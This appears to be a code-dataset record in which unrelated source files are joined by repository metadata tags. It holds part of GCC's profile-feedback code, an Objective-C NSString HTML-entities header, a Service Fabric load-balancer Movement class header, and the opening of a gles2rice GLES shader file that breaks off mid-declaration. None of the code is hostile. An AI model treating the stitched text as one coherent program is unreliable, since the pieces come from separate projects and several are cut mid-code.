0; /* One of the counts will be invalid, but it is zero, so adding it in also doesn't hurt. */ FOR_EACH_EDGE (e, ei, bb->preds) total += e->count; /* Search for the invalid edge, and set its count. */ FOR_EACH_EDGE (e, ei, bb->preds) if (!EDGE_INFO (e)->count_valid && !EDGE_INFO (e)->ignore) break; /* Calculate count for remaining edge by conservation. */ total = bb->count - total + e->count; gcc_assert (e); EDGE_INFO (e)->count_valid = 1; e->count = total; bi->pred_count--; BB_INFO (e->src)->succ_count--; changes = 1; } } } } if (dump_file) { int overlap = compute_frequency_overlap (); dump_flow_info (dump_file, dump_flags); fprintf (dump_file, "Static profile overlap: %d.%d%%\n", overlap / (OVERLAP_BASE / 100), overlap % (OVERLAP_BASE / 100)); } total_num_passes += passes; if (dump_file) fprintf (dump_file, "Graph solving took %d passes.\n\n", passes); /* If the graph has been correctly solved, every block will have a succ and pred count of zero. */ FOR_EACH_BB (bb) { gcc_assert (!BB_INFO (bb)->succ_count && !BB_INFO (bb)->pred_count); } /* Check for inconsistent basic block counts */ inconsistent = is_inconsistent (); if (inconsistent) { if (flag_profile_correction) { /* Inconsistency detected. Make it flow-consistent. */ static int informed = 0; if (informed == 0) { informed = 1; inform (input_location, "correcting inconsistent profile data"); } correct_negative_edge_counts (); /* Set bb counts to the sum of the outgoing edge counts */ set_bb_counts (); if (dump_file) fprintf (dump_file, "\nCalling mcf_smooth_cfg\n"); mcf_smooth_cfg (); } else error ("corrupted profile info: profile data is not flow-consistent"); } /* For every edge, calculate its branch probability and add a reg_note to the branch insn to indicate this. */ for (i = 0; i < 20; i++) hist_br_prob[i] = 0; num_branches = 0; FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) { edge e; edge_iterator ei; if (bb->count < 0) { error ("corrupted profile info: number of iterations for basic block %d thought to be %i", bb->index, (int)bb->count); bb->count = 0; } FOR_EACH_EDGE (e, ei, bb->succs) { /* Function may return twice in the cased the called function is setjmp or calls fork, but we can't represent this by extra edge from the entry, since extra edge from the exit is already present. We get negative frequency from the entry point. */ if ((e->count < 0 && e->dest == EXIT_BLOCK_PTR) || (e->count > bb->count && e->dest != EXIT_BLOCK_PTR)) { if (block_ends_with_call_p (bb)) e->count = e->count < 0 ? 0 : bb->count; } if (e->count < 0 || e->count > bb->count) { error ("corrupted profile info: number of executions for edge %d-%d thought to be %i", e->src->index, e->dest->index, (int)e->count); e->count = bb->count / 2; } } if (bb->count) { FOR_EACH_EDGE (e, ei, bb->succs) e->probability = (e->count * REG_BR_PROB_BASE + bb->count / 2) / bb->count; if (bb->index >= NUM_FIXED_BLOCKS && block_ends_with_condjump_p (bb) && EDGE_COUNT (bb->succs) >= 2) { int prob; edge e; int index; /* Find the branch edge. It is possible that we do have fake edges here. */ FOR_EACH_EDGE (e, ei, bb->succs) if (!(e->flags & (EDGE_FAKE | EDGE_FALLTHRU))) break; prob = e->probability; index = prob * 20 / REG_BR_PROB_BASE; if (index == 20) index = 19; hist_br_prob[index]++; num_branches++; } } /* As a last resort, distribute the probabilities evenly. Use simple heuristics that if there are normal edges, give all abnormals frequency of 0, otherwise distribute the frequency over abnormals (this is the case of noreturn calls). */ else if (profile_status == PROFILE_ABSENT) { int total = 0; FOR_EACH_EDGE (e, ei, bb->succs) if (!(e->flags & (EDGE_COMPLEX | EDGE_FAKE))) total ++; if (total) { FOR_EACH_EDGE (e, ei, bb->succs) if (!(e->flags & (EDGE_COMPLEX | EDGE_FAKE))) e->probability = REG_BR_PROB_BASE / total; else e->probability = 0; } else { total += EDGE_COUNT (bb->succs); FOR_EACH_EDGE (e, ei, bb->succs) e->probability = REG_BR_PROB_BASE / total; } if (bb->index >= NUM_FIXED_BLOCKS && block_ends_with_condjump_p (bb) && EDGE_COUNT (bb->succs) >= 2) num_branches++; } } counts_to_freqs (); profile_status = PROFILE_READ; compute_function_frequency (); if (dump_file) { fprintf (dump_file, "%d branches\n", num_branches); if (num_branches) for (i = 0; i < 10; i++) fprintf (dump_file, "%d%% branches in range %d-%d%%\n", (hist_br_prob[i] + hist_br_prob[19-i]) * 100 / num_branches, 5 * i, 5 * i + 5); total_num_branches += num_branches; for (i = 0; i < 20; i++) total_hist_br_prob[i] += hist_br_prob[i]; fputc ('\n', dump_file); fputc ('\n', dump_file); } free_aux_for_blocks (); } /* Load value histograms values whose description is stored in VALUES array from .gcda file. CFG_CHECKSUM is the precomputed checksum for the CFG. */ static void compute_value_histograms (histogram_values values, unsigned cfg_checksum, unsigned lineno_checksum) { unsigned i, j, t, any; unsigned n_histogram_counters[GCOV_N_VALUE_COUNTERS]; gcov_type *histogram_counts[GCOV_N_VALUE_COUNTERS]; gcov_type *act_count[GCOV_N_VALUE_COUNTERS]; gcov_type *aact_count; for (t = 0; t < GCOV_N_VALUE_COUNTERS; t++) n_histogram_counters[t] = 0; for (i = 0; i < VEC_length (histogram_value, values); i++) { histogram_value hist = VEC_index (histogram_value, values, i); n_histogram_counters[(int) hist->type] += hist->n_counters; } any = 0; for (t = 0; t < GCOV_N_VALUE_COUNTERS; t++) { if (!n_histogram_counters[t]) { histogram_counts[t] = NULL; continue; } histogram_counts[t] = get_coverage_counts (COUNTER_FOR_HIST_TYPE (t), n_histogram_counters[t], cfg_checksum, lineno_checksum, NULL); if (histogram_counts[t]) any = 1; act_count[t] = histogram_counts[t]; } if (!any) return; for (i = 0; i < VEC_length (histogram_value, values); i++) { histogram_value hist = VEC_index (histogram_value, values, i); gimple stmt = hist->hvalue.stmt; t = (int) hist->type; aact_count = act_count[t]; act_count[t] += hist->n_counters; gimple_add_histogram_value (cfun, stmt, hist); hist->hvalue.counters = XNEWVEC (gcov_type, hist->n_counters); for (j = 0; j < hist->n_counters; j++) hist->hvalue.counters[j] = aact_count[j]; } for (t = 0; t < GCOV_N_VALUE_COUNTERS; t++) free (histogram_counts[t]); } /* The entry basic block will be moved around so that it has index=1, there is nothing at index 0 and the exit is at n_basic_block. */ #define BB_TO_GCOV_INDEX(bb) ((bb)->index - 1) /* When passed NULL as file_name, initialize. When passed something else, output the necessary commands to change line to LINE and offset to FILE_NAME. */ static void output_location (char const *file_name, int line, gcov_position_t *offset, basic_block bb) { static char const *prev_file_name; static int prev_line; bool name_differs, line_differs; if (!file_name) { prev_file_name = NULL; prev_line = -1; return; } name_differs = !prev_file_name || filename_cmp (file_name, prev_file_name); line_differs = prev_line != line; if (name_differs || line_differs) { if (!*offset) { *offset = gcov_write_tag (GCOV_TAG_LINES); gcov_write_unsigned (BB_TO_GCOV_INDEX (bb)); name_differs = line_differs=true; } /* If this is a new source file, then output the file's name to the .bb file. */ if (name_differs) { prev_file_name = file_name; gcov_write_unsigned (0); gcov_write_string (prev_file_name); } if (line_differs) { gcov_write_unsigned (line); prev_line = line; } } } /* Instrument and/or analyze program behavior based on program flow graph. In either case, this function builds a flow graph for the function being compiled. The flow graph is stored in BB_GRAPH. When FLAG_PROFILE_ARCS is nonzero, this function instruments the edges in the flow graph that are needed to reconstruct the dynamic behavior of the flow graph. When FLAG_BRANCH_PROBABILITIES is nonzero, this function reads auxiliary information from a data file containing edge count information from previous executions of the function being compiled. In this case, the flow graph is annotated with actual execution counts, which are later propagated into the rtl for optimization purposes. Main entry point of this file. */ void branch_prob (void) { basic_block bb; unsigned i; unsigned num_edges, ignored_edges; unsigned num_instrumented; struct edge_list *el; histogram_values values = NULL; unsigned cfg_checksum, lineno_checksum; total_num_times_called++; flow_call_edges_add (NULL); add_noreturn_fake_exit_edges (); /* We can't handle cyclic regions constructed using abnormal edges. To avoid these we replace every source of abnormal edge by a fake edge from entry node and every destination by fake edge to exit. This keeps graph acyclic and our calculation exact for all normal edges except for exit and entrance ones. We also add fake exit edges for each call and asm statement in the basic, since it may not return. */ FOR_EACH_BB (bb) { int need_exit_edge = 0, need_entry_edge = 0; int have_exit_edge = 0, have_entry_edge = 0; edge e; edge_iterator ei; /* Functions returning multiple times are not handled by extra edges. Instead we simply allow negative counts on edges from exit to the block past call and corresponding probabilities. We can't go with the extra edges because that would result in flowgraph that needs to have fake edges outside the spanning tree. */ FOR_EACH_EDGE (e, ei, bb->succs) { gimple_stmt_iterator gsi; gimple last = NULL; /* It may happen that there are compiler generated statements without a locus at all. Go through the basic block from the last to the first statement looking for a locus. */ for (gsi = gsi_last_nondebug_bb (bb); !gsi_end_p (gsi); gsi_prev_nondebug (&gsi)) { last = gsi_stmt (gsi); if (gimple_has_location (last)) break; } /* Edge with goto locus might get wrong coverage info unless it is the only edge out of BB. Don't do that when the locuses match, so if (blah) goto something; is not computed twice. */ if (last && gimple_has_location (last) && e->goto_locus != UNKNOWN_LOCATION && !single_succ_p (bb) && (LOCATION_FILE (e->goto_locus) != LOCATION_FILE (gimple_location (last)) || (LOCATION_LINE (e->goto_locus) != LOCATION_LINE (gimple_location (last))))) { basic_block new_bb = split_edge (e); edge ne = single_succ_edge (new_bb); ne->goto_locus = e->goto_locus; ne->goto_block = e->goto_block; } if ((e->flags & (EDGE_ABNORMAL | EDGE_ABNORMAL_CALL)) && e->dest != EXIT_BLOCK_PTR) need_exit_edge = 1; if (e->dest == EXIT_BLOCK_PTR) have_exit_edge = 1; } FOR_EACH_EDGE (e, ei, bb->preds) { if ((e->flags & (EDGE_ABNORMAL | EDGE_ABNORMAL_CALL)) && e->src != ENTRY_BLOCK_PTR) need_entry_edge = 1; if (e->src == ENTRY_BLOCK_PTR) have_entry_edge = 1; } if (need_exit_edge && !have_exit_edge) { if (dump_file) fprintf (dump_file, "Adding fake exit edge to bb %i\n", bb->index); make_edge (bb, EXIT_BLOCK_PTR, EDGE_FAKE); } if (need_entry_edge && !have_entry_edge) { if (dump_file) fprintf (dump_file, "Adding fake entry edge to bb %i\n", bb->index); make_edge (ENTRY_BLOCK_PTR, bb, EDGE_FAKE); /* Avoid bbs that have both fake entry edge and also some exit edge. One of those edges wouldn't be added to the spanning tree, but we can't instrument any of them. */ if (have_exit_edge || need_exit_edge) { gimple_stmt_iterator gsi; gimple first; tree fndecl; gsi = gsi_after_labels (bb); gcc_checking_assert (!gsi_end_p (gsi)); first = gsi_stmt (gsi); if (is_gimple_debug (first)) { gsi_next_nondebug (&gsi); gcc_checking_assert (!gsi_end_p (gsi)); first = gsi_stmt (gsi); } /* Don't split the bbs containing __builtin_setjmp_receiver or __builtin_setjmp_dispatcher calls. These are very special and don't expect anything to be inserted before them. */ if (!is_gimple_call (first) || (fndecl = gimple_call_fndecl (first)) == NULL || DECL_BUILT_IN_CLASS (fndecl) != BUILT_IN_NORMAL || (DECL_FUNCTION_CODE (fndecl) != BUILT_IN_SETJMP_RECEIVER && (DECL_FUNCTION_CODE (fndecl) != BUILT_IN_SETJMP_DISPATCHER))) { if (dump_file) fprintf (dump_file, "Splitting bb %i after labels\n", bb->index); split_block_after_labels (bb); } } } } el = create_edge_list (); num_edges = NUM_EDGES (el); alloc_aux_for_edges (sizeof (struct edge_info)); /* The basic blocks are expected to be numbered sequentially. */ compact_blocks (); ignored_edges = 0; for (i = 0 ; i < num_edges ; i++) { edge e = INDEX_EDGE (el, i); e->count = 0; /* Mark edges we've replaced by fake edges above as ignored. */ if ((e->flags & (EDGE_ABNORMAL | EDGE_ABNORMAL_CALL)) && e->src != ENTRY_BLOCK_PTR && e->dest != EXIT_BLOCK_PTR) { EDGE_INFO (e)->ignore = 1; ignored_edges++; } } /* Create spanning tree from basic block graph, mark each edge that is on the spanning tree. We insert as many abnormal and critical edges as possible to minimize number of edge splits necessary. */ find_spanning_tree (el); /* Fake edges that are not on the tree will not be instrumented, so mark them ignored. */ for (num_instrumented = i = 0; i < num_edges; i++) { edge e = INDEX_EDGE (el, i); struct edge_info *inf = EDGE_INFO (e); if (inf->ignore || inf->on_tree) /*NOP*/; else if (e->flags & EDGE_FAKE) { inf->ignore = 1; ignored_edges++; } else num_instrumented++; } total_num_blocks += n_basic_blocks; if (dump_file) fprintf (dump_file, "%d basic blocks\n", n_basic_blocks); total_num_edges += num_edges; if (dump_file) fprintf (dump_file, "%d edges\n", num_edges); total_num_edges_ignored += ignored_edges; if (dump_file) fprintf (dump_file, "%d ignored edges\n", ignored_edges); /* Compute two different checksums. Note that we want to compute the checksum in only once place, since it depends on the shape of the control flow which can change during various transformations. */ cfg_checksum = coverage_compute_cfg_checksum (); lineno_checksum = coverage_compute_lineno_checksum (); /* Write the data from which gcov can reconstruct the basic block graph and function line numbers */ if (coverage_begin_function (lineno_checksum, cfg_checksum)) { gcov_position_t offset; /* Basic block flags */ offset = gcov_write_tag (GCOV_TAG_BLOCKS); for (i = 0; i != (unsigned) (n_basic_blocks); i++) gcov_write_unsigned (0); gcov_write_length (offset); /* Keep all basic block indexes nonnegative in the gcov output. Index 0 is used for entry block, last index is for exit block. */ ENTRY_BLOCK_PTR->index = 1; EXIT_BLOCK_PTR->index = last_basic_block; /* Arcs */ FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, EXIT_BLOCK_PTR, next_bb) { edge e; edge_iterator ei; offset = gcov_write_tag (GCOV_TAG_ARCS); gcov_write_unsigned (BB_TO_GCOV_INDEX (bb)); FOR_EACH_EDGE (e, ei, bb->succs) { struct edge_info *i = EDGE_INFO (e); if (!i->ignore) { unsigned flag_bits = 0; if (i->on_tree) flag_bits |= GCOV_ARC_ON_TREE; if (e->flags & EDGE_FAKE) flag_bits |= GCOV_ARC_FAKE; if (e->flags & EDGE_FALLTHRU) flag_bits |= GCOV_ARC_FALLTHROUGH; /* On trees we don't have fallthru flags, but we can recompute them from CFG shape. */ if (e->flags & (EDGE_TRUE_VALUE | EDGE_FALSE_VALUE) && e->src->next_bb == e->dest) flag_bits |= GCOV_ARC_FALLTHROUGH; gcov_write_unsigned (BB_TO_GCOV_INDEX (e->dest)); gcov_write_unsigned (flag_bits); } } gcov_write_length (offset); } ENTRY_BLOCK_PTR->index = ENTRY_BLOCK; EXIT_BLOCK_PTR->index = EXIT_BLOCK; /* Line numbers. */ /* Initialize the output. */ output_location (NULL, 0, NULL, NULL); FOR_EACH_BB (bb) { gimple_stmt_iterator gsi; gcov_position_t offset = 0; if (bb == ENTRY_BLOCK_PTR->next_bb) { expanded_location curr_location = expand_location (DECL_SOURCE_LOCATION (current_function_decl)); output_location (curr_location.file, curr_location.line, &offset, bb); } for (gsi = gsi_start_bb (bb); !gsi_end_p (gsi); gsi_next (&gsi)) { gimple stmt = gsi_stmt (gsi); if (gimple_has_location (stmt)) output_location (gimple_filename (stmt), gimple_lineno (stmt), &offset, bb); } /* Notice GOTO expressions eliminated while constructing the CFG. */ if (single_succ_p (bb) && single_succ_edge (bb)->goto_locus != UNKNOWN_LOCATION) { expanded_location curr_location = expand_location (single_succ_edge (bb)->goto_locus); output_location (curr_location.file, curr_location.line, &offset, bb); } if (offset) { /* A file of NULL indicates the end of run. */ gcov_write_unsigned (0); gcov_write_string (NULL); gcov_write_length (offset); } } } #undef BB_TO_GCOV_INDEX if (flag_profile_values) gimple_find_values_to_profile (&values); if (flag_branch_probabilities) { compute_branch_probabilities (cfg_checksum, lineno_checksum); if (flag_profile_values) compute_value_histograms (values, cfg_checksum, lineno_checksum); } remove_fake_edges (); /* For each edge not on the spanning tree, add counting code. */ if (profile_arc_flag && coverage_counter_alloc (GCOV_COUNTER_ARCS, num_instrumented)) { unsigned n_instrumented; gimple_init_edge_profiler (); n_instrumented = instrument_edges (el); gcc_assert (n_instrumented == num_instrumented); if (flag_profile_values) instrument_values (values); /* Commit changes done by instrumentation. */ gsi_commit_edge_inserts (); } free_aux_for_edges (); VEC_free (histogram_value, heap, values); free_edge_list (el); coverage_end_function (lineno_checksum, cfg_checksum); } /* Union find algorithm implementation for the basic blocks using aux fields. */ static basic_block find_group (basic_block bb) { basic_block group = bb, bb1; while ((basic_block) group->aux != group) group = (basic_block) group->aux; /* Compress path. */ while ((basic_block) bb->aux != group) { bb1 = (basic_block) bb->aux; bb->aux = (void *) group; bb = bb1; } return group; } static void union_groups (basic_block bb1, basic_block bb2) { basic_block bb1g = find_group (bb1); basic_block bb2g = find_group (bb2); /* ??? I don't have a place for the rank field. OK. Lets go w/o it, this code is unlikely going to be performance problem anyway. */ gcc_assert (bb1g != bb2g); bb1g->aux = bb2g; } /* This function searches all of the edges in the program flow graph, and puts as many bad edges as possible onto the spanning tree. Bad edges include abnormals edges, which can't be instrumented at the moment. Since it is possible for fake edges to form a cycle, we will have to develop some better way in the future. Also put critical edges to the tree, since they are more expensive to instrument. */ static void find_spanning_tree (struct edge_list *el) { int i; int num_edges = NUM_EDGES (el); basic_block bb; /* We use aux field for standard union-find algorithm. */ FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) bb->aux = bb; /* Add fake edge exit to entry we can't instrument. */ union_groups (EXIT_BLOCK_PTR, ENTRY_BLOCK_PTR); /* First add all abnormal edges to the tree unless they form a cycle. Also add all edges to EXIT_BLOCK_PTR to avoid inserting profiling code behind setting return value from function. */ for (i = 0; i < num_edges; i++) { edge e = INDEX_EDGE (el, i); if (((e->flags & (EDGE_ABNORMAL | EDGE_ABNORMAL_CALL | EDGE_FAKE)) || e->dest == EXIT_BLOCK_PTR) && !EDGE_INFO (e)->ignore && (find_group (e->src) != find_group (e->dest))) { if (dump_file) fprintf (dump_file, "Abnormal edge %d to %d put to tree\n", e->src->index, e->dest->index); EDGE_INFO (e)->on_tree = 1; union_groups (e->src, e->dest); } } /* Now insert all critical edges to the tree unless they form a cycle. */ for (i = 0; i < num_edges; i++) { edge e = INDEX_EDGE (el, i); if (EDGE_CRITICAL_P (e) && !EDGE_INFO (e)->ignore && find_group (e->src) != find_group (e->dest)) { if (dump_file) fprintf (dump_file, "Critical edge %d to %d put to tree\n", e->src->index, e->dest->index); EDGE_INFO (e)->on_tree = 1; union_groups (e->src, e->dest); } } /* And now the rest. */ for (i = 0; i < num_edges; i++) { edge e = INDEX_EDGE (el, i); if (!EDGE_INFO (e)->ignore && find_group (e->src) != find_group (e->dest)) { if (dump_file) fprintf (dump_file, "Normal edge %d to %d put to tree\n", e->src->index, e->dest->index); EDGE_INFO (e)->on_tree = 1; union_groups (e->src, e->dest); } } FOR_BB_BETWEEN (bb, ENTRY_BLOCK_PTR, NULL, next_bb) bb->aux = NULL; } /* Perform file-level initialization for branch-prob processing. */ void init_branch_prob (void) { int i; total_num_blocks = 0; total_num_edges = 0; total_num_edges_ignored = 0; total_num_edges_instrumented = 0; total_num_blocks_created = 0; total_num_passes = 0; total_num_times_called = 0; total_num_branches = 0; for (i = 0; i < 20; i++) total_hist_br_prob[i] = 0; } /* Performs file-level cleanup after branch-prob processing is completed. */ void end_branch_prob (void) { if (dump_file) { fprintf (dump_file, "\n"); fprintf (dump_file, "Total number of blocks: %d\n", total_num_blocks); fprintf (dump_file, "Total number of edges: %d\n", total_num_edges); fprintf (dump_file, "Total number of ignored edges: %d\n", total_num_edges_ignored); fprintf (dump_file, "Total number of instrumented edges: %d\n", total_num_edges_instrumented); fprintf (dump_file, "Total number of blocks created: %d\n", total_num_blocks_created); fprintf (dump_file, "Total number of graph solution passes: %d\n", total_num_passes); if (total_num_times_called != 0) fprintf (dump_file, "Average number of graph solution passes: %d\n", (total_num_passes + (total_num_times_called >> 1)) / total_num_times_called); fprintf (dump_file, "Total number of branches: %d\n", total_num_branches); if (total_num_branches) { int i; for (i = 0; i < 10; i++) fprintf (dump_file, "%d%% branches in range %d-%d%%\n", (total_hist_br_prob[i] + total_hist_br_prob[19-i]) * 100 / total_num_branches, 5*i, 5*i+5); } } }
17,119
329
<gh_stars>100-1000 // // NSStringHTMLEntities.h // HTMLTranslator // // Created by <NAME> on Thu Aug 12 2004. // Copyright (c) 2004 <NAME>. // // This software is provided 'as-is', without any express or implied // warranty. In no event will the authors be held liable for any damages // arising from the use of this software. // // Permission is granted to anyone to use this software for any purpose, // including commercial applications, and to alter it and redistribute it // freely, subject to the following restrictions: // // 1. The origin of this software must not be misrepresented; you must not // claim that you wrote the original software. If you use this software // in a product, an acknowledgment in the product documentation would be // appreciated but is not required. // // 2. Altered source versions must be plainly marked as such, and must not be // misrepresented as being the original software. // // 3. This notice may not be removed or altered from any source // distribution. // #import <Foundation/Foundation.h> @interface NSString (UKHTMLEntities) -(NSString*) stringByInsertingHTMLEntities; -(NSString*) stringByInsertingHTMLEntitiesAndLineBreaks: (BOOL)br; // YES = generate <br>s, NO = same as stringByInsertingHTMLEntities. @end
382
2,542
<reponame>gridgentoo/ServiceFabricAzure<gh_stars>1000+ // ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #pragma once #include "PartitionEntry.h" #include "PlacementReplica.h" namespace Reliability { namespace LoadBalancingComponent { class NodeEntry; class ServiceEntry; class Movement { public: struct Type { enum Enum { None = 0, Swap = 1, Move = 2, Add = 3, Promote = 4, AddAndPromote = 5, Void = 6, Drop = 7 }; }; static Movement Invalid; static Movement Create(PlacementReplica const* r1, PlacementReplica const* r2, bool forUpgrade = false); static Movement Create(PlacementReplica const* replica, NodeEntry const* targetNode, bool forUpgrade = false); static Movement CreatePromoteSecondaryMovement(PartitionEntry const* partition, NodeEntry const* targetNode, PlacementReplica const* targetReplica, bool isTestMode); //A migrate is whatever necessary to get a primary onto the target node minimally, whether, swap, add and promote, or move static Movement CreateMigratePrimaryMovement(PartitionEntry const* partition, NodeEntry const* targetNode, bool isTestMode); static Movement CreateAddAndPromoteMovement(PlacementReplica const* replica, NodeEntry const* targetNode); static Movement CreateVoidMovement(PartitionEntry const* partition, NodeEntry const* targetNode); static Movement CreateDrop(PlacementReplica const* replica, NodeEntry const* sourceNode); Movement(); // using compiler generated copy constructor and assignment constructor __declspec (property(get=get_Service)) ServiceEntry const* Service; ServiceEntry const* get_Service() const { return partition_->Service; } __declspec (property(get=get_Partition)) PartitionEntry const* Partition; PartitionEntry const* get_Partition() const { return partition_; } __declspec (property(get=get_SourceToBeDeletedReplica)) PlacementReplica const* SourceToBeDeletedReplica; PlacementReplica const* get_SourceToBeDeletedReplica() const { return (!sourceOrNewReplica_ || sourceOrNewReplica_->IsNew) ? nullptr: sourceOrNewReplica_; } __declspec (property(get=get_TargetToBeDeletedReplica)) PlacementReplica const* TargetToBeDeletedReplica; PlacementReplica const* get_TargetToBeDeletedReplica() const { return targetReplica_; } __declspec (property(get=get_SourceToBeAddedReplica)) PlacementReplica const* SourceToBeAddedReplica; PlacementReplica const* get_SourceToBeAddedReplica() const { return targetReplica_; } __declspec (property(get=get_TargetToBeAddedReplica)) PlacementReplica const* TargetToBeAddedReplica; PlacementReplica const* get_TargetToBeAddedReplica() const { return sourceOrNewReplica_; } __declspec (property(get=get_SourceNode)) NodeEntry const* SourceNode; NodeEntry const* get_SourceNode() const { return sourceNode_; } __declspec (property(get=get_TargetNode)) NodeEntry const* TargetNode; NodeEntry const* get_TargetNode() const { return targetNode_; } // the role of existing replica on source node __declspec (property(get=get_SourceRole)) ReplicaRole::Enum SourceRole; ReplicaRole::Enum get_SourceRole() const { return (!sourceOrNewReplica_ || sourceOrNewReplica_->IsNew) ? ReplicaRole::None : sourceOrNewReplica_->Role; } // the role of existing replica on target node __declspec (property(get=get_TargetRole)) ReplicaRole::Enum TargetRole; ReplicaRole::Enum get_TargetRole() const { return targetReplica_ != nullptr ? targetReplica_->Role : ReplicaRole::None; } __declspec (property(get=get_Type)) Type::Enum MoveType; Type::Enum get_Type() const { return type_; } __declspec (property(get=get_IsSwap)) bool IsSwap; bool get_IsSwap() const { return type_ == Type::Swap; } __declspec (property(get=get_IsMove)) bool IsMove; bool get_IsMove() const { return type_ == Type::Move; } __declspec (property(get=get_IsAdd)) bool IsAdd; bool get_IsAdd() const { return type_ == Type::Add; } __declspec (property(get=get_IsVoid)) bool IsVoid; bool get_IsVoid() const { return type_ == Type::Void; } __declspec (property(get=get_IsPromote)) bool IsPromote; bool get_IsPromote() const { return type_ == Type::Promote;} __declspec (property(get=get_IsAddAndPromote)) bool IsAddAndPromote; bool get_IsAddAndPromote() const { return type_ == Type::AddAndPromote;} __declspec (property(get=get_IsDrop)) bool IsDrop; bool get_IsDrop() const { return type_ == Type::Drop; } __declspec (property(get=get_IsValid)) bool IsValid; bool get_IsValid() const { return partition_ != nullptr; } __declspec (property(get = get_IncreasingTargetLoad)) bool IncreasingTargetLoad; bool get_IncreasingTargetLoad() const { return IsMove || IsAdd || IsAddAndPromote; } __declspec (property(get = get_TargetNodeHasLoadBeforeMove)) bool TargetNodeHasLoadBeforeMove; bool get_TargetNodeHasLoadBeforeMove() const { return IsSwap || IsPromote; } bool operator == ( Movement const& other ) const; bool operator != ( Movement const& other ) const; void ForEachReplica(std::function<void(PlacementReplica const *)> processor) const; void WriteTo(Common::TextWriter& writer, Common::FormatOptions const &) const; private: PartitionEntry const* partition_; PlacementReplica const* sourceOrNewReplica_; // existing replica on source node or the new replica PlacementReplica const* targetReplica_; // existing replica on target node NodeEntry const* sourceNode_; NodeEntry const* targetNode_; Type::Enum type_; }; void WriteToTextWriter(Common::TextWriter & w, Movement::Type::Enum const & val); } }
2,693
335
<filename>code/src/gles2rice/src/OGLES2FragmentShaders.cpp /* Copyright (C) 2003 Rice1964 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include <stdlib.h> #include "OGLES2FragmentShaders.h" #include "OGLRender.h" #include "OGLTexture.h" #define ALPHA_TEST " if(gl_FragColor.a < AlphaRef) discard; \n" GLuint vertexProgram = 9999; const char *vertexShader = "#version " GLSL_VERSION "\n" #if !defined(HAVE_OPENGLES2) "#define lowp \n" "#define mediump \n" #endif "attribute mediump vec4 aPosition; \n"\ "attribute lowp vec4 aColor; \n"\ "attribute lowp vec2 aTexCoord0; \n"\ "attribute lowp vec2 aTexCoord1; \n"\ "attribute lowp vec2 aAtlasTransform; \n"\ "attribute mediump float aFogCoord; \n"\ " \n"\ "uniform vec2 FogMinMax; \n"\ " \n"\ "varying lowp float vFactor; \n"\ "varying lowp vec4 vShadeColor; \n"\ "varying mediump vec2 vTexCoord0; \n"\ "varying lowp vec2 vTexCoord1; \n"\ "varying lowp float vFog; \n"\ " \n"\ "void main() \n"\ "{ \n"\ " gl_Position = aPosition; \n"\ " vShadeColor = aColor; \n"\ " vTexCoord0 = aTexCoord0; \n"\ " vTexCoord1 = aTexCoord1; \n"\ " vFog = (FogMinMax[1] - aFogCoord) / (FogMinMax[1] - FogMinMax[0]); \n"\ " vFog = clamp(vFog, 0.0, 1.0); \n"\ "} \n"\ " \n"; const char *fragmentHeader = "#define saturate(x) clamp( x, 0.0, 1.0 ) \n" #if !defined(HAVE_OPENGLES2) "#define lowp \n" "#define mediump \n" #else "precision lowp float; \n" #endif "#ifdef NEED_TEX0 \n"\ "uniform sampler2D uTex0; \n"\ "#endif \n"\ " \n"\ "#ifdef NEED_TEX1 \n"\ "uniform sampler2D uTex1; \n"\ "#endif \n"\ " \n"\ "uniform vec4 EnvColor; \n"\ "uniform vec4 PrimColor; \n"\ "uniform vec4 EnvFrac; \n"\ "uniform vec4 PrimFrac; \n"\ "uniform float AlphaRef; \n"\ "uniform vec4 FogColor; \n"\ " \n"\ "varying lowp vec4 vShadeColor; \n"\ "varying mediump vec2 vTexCoord0; \n"\ "varying lowp vec2 vTexCoord1; \n"\ "varying lowp float vFog; \n"\ " \n"\ "void main() \n"\ "{ \n"\ " vec4 comb,comb2; \n"\ " \n"\ "#ifdef NEED_TEX0 \n"\ " vec4 t0 = texture2D(uTex0,vTexCoord0); \n"\ "#endif \n"\ " \n"\ "#ifdef NEED_TEX1 \n"\ " vec4 t1 = texture2D(uTex1,vTexCoord1); \n"\ "#endif \n"; const char *fragmentFooter = " \n"\ "#ifdef FOG \n"\ " gl_FragColor.rgb = mix(FogColor.rgb, comb.rgb, vFog); \n"\ " gl_FragColor.a = comb.a; \n"\ "#else \n"\ " gl_FragColor = comb; \n"\ "#endif \n"\ " \n"\ "#ifdef ALPHA_TEST \n"\ ALPHA_TEST "#endif \n"\ "} \n"; //Fragment shader for InitCycleCopy const char *fragmentCopy = "#version " GLSL_VERSION "\n" #if !defined(HAVE_OPENGLES2) "#define lowp \n" "#define mediump \n" #else "precision lowp float; \n" #endif "uniform sampler2D uTex0; \n"\ "uniform float AlphaRef; \n"\ "varying lowp vec2 vTexCoord0; \n"\ "void main() \n"\ "{ \n"\ " gl_FragColor = texture2D(uTex0,vTexCoord0).bgra; \n" \ ALPHA_TEST "}"; GLuint copyProgram,copyAlphaLocation; //Fragment shader for InitCycleFill const char *fragmentFill = "#version " GLSL_VERSION "\n" #if !defined(HAVE_OPENGLES2) "#define lowp \n" "#define mediump \n" #else "precision lowp float; \n" #endif "uniform vec4 uColor; \n" "void main() \n" "{ \n" " gl_FragColor = uColor; \n" "}"; GLuint fillProgram,fillColorLocation; COGLFragmentShaderCombiner::COGLFragmentShaderCombiner(CRender *pRender) : COGLColorCombiner(pRender) { m_bShaderIsSupported = true; } COGLFragmentShaderCombiner::~COGLFragmentShaderCombiner() { } bool COGLFragmentShaderCombiner::Initialize(void) { if( !COGLColorCombiner::Initialize() ) return false; m_bShaderIsSupported = true; return true; } void COGLFragmentShaderCombiner::InitCombinerCycle12(void) { } void COGLFragmentShaderCombiner::DisableCombiner(void) { COGLColorCombiner::DisableCombiner(); } void 